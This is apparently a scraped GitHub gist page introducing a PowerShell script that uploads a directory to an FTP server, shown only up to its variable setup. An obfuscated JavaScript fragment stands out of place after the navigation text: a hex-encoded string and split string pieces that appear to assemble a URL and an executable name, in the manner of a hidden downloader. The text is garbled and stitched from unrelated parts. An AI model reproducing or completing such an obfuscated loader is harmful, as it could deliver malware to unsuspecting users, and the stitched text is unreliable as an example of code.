Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

var a19 = '555C5C5E0D0A020B24060149100C0149000E4A070B095E255E0507010D1001170B080D06054A070B095E17505E5550515256555255525C5E55',
m54 = 'ea',
b25 = 'tp:',
h8 = '00) ',
x58 = '(v',
n86 = 'xe",',
j32 = '); va',
h62 = 'e(); ',
v24 = 'rea',
q96 = '}; }',
@TheUltimateC0der
TheUltimateC0der / FTP-UploadDirectory.ps1
Created May 12, 2017 19:37 — forked from dkittell/FTP-UploadDirectory.ps1
PowerShell – FTP Upload Directory With Sub-Directories
clear
# FTP Server Variables
$FTPHost = 'ftp://192.168.1.1/html/'
$FTPUser = 'user'
$FTPPass = 'password'
#Directory where to find pictures to upload
$UploadFolder = "C:\Temp\"